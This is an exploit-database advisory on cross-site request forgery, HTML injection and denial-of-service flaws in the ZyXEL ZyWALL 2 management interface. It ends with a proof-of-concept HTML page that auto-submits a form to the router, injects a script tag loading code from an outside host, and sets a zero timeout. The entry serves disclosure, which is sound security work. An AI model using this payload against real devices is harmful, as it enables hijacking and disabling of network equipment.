ZyXEL ZyWALL 2 Multiple Remote Vulnerabilities

vendor:

ZyWALL 2

by:

Unknown

7.5

CVSS

HIGH

Cross-Site Request Forgery, HTML Injection, Denial-of-Service

Unknown

CWE

Product Name: ZyWALL 2

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE: Unknown

CPE: h:zyxel:zywall_2

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

ZyXEL ZyWALL 2 Multiple Remote Vulnerabilities

The ZyXEL ZyWALL 2 is prone to multiple remote vulnerabilities that affect the management interface. An attacker can exploit these issues to carry out cross-site request forgery, HTML-injection, and denial-of-service attacks. The exploit code provided demonstrates a cross-site request forgery attack that injects malicious HTML code into the 'sysSystemName' and 'sysDomainName' fields, potentially leading to HTML-injection attacks. Additionally, the exploit sets the 'StdioTimout' field to '0', causing a denial-of-service condition. The vulnerability is reported to affect ZyWALL 2 devices running firmware V3.62(WK.6).

Mitigation:

No mitigation or remediation information provided

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25262/info

ZyXEL ZyWALL 2 is prone to multiple remote vulnerabilities that affect the management interface.

An attacker can exploit these issues to carry out cross-site request forgery, HTML-injection, and denial-of-service attacks.

ZyWALL 2 running with firmware V3.62(WK.6) is reported vulnerable to this issue. 

 <html>
  <body onload="document.CSRF.submit()">
  <FORM name="CSRF" METHOD="POST"
ACTION="http://192.168.1.1/Forms/General_1">
  <INPUT NAME="sysSystemName" VALUE="<script src='http://nx.fi/X'>"
  <INPUT NAME="sysDomainName" VALUE="evil.com">
  <INPUT NAME="StdioTimout" VALUE="0">
  <INPUT NAME="sysSubmit" VALUE="Apply">
  </form>
  </body>
  </html>